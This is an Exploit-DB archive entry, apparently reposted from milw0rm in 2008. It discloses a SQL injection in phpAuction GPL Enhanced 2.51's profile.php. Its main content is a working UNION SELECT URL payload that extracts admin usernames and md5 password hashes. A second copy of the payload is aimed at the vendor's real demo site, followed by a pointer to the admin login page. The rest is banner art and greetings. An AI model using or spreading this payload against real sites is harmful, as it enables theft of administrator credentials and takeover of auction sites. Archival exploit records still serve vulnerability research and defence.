phpAuction GPL Enhanced 2.51 - 'profile.php' SQL Injection

EDB-ID:

6182


Author:

Hussin X

Type:

webapps


Platform:

PHP

Date:

2008-08-01


|___________________________________________________|
|
| PHPAuction GPL Enhanced V2.51 (profile.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
|
| script : http://phpauctions.info/
|
| DorK   : /:)
|___________________________________________________|

Exploit:  



www.[target].com/Script/profile.php?id=-19+union+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+PHPAUCTION_adminusers--


L!VE DEMO: :


http://phpauctions.info/phpauction/demo/profile.php?id=-19+union+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+PHPAUCTION_adminusers--


___________________

admin login :

www.[target].com/Script/admin/
___________________
password : md5
___________________


____________________________( Greetz )____________________________
|
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
|   
| CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n 
|
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-08-01]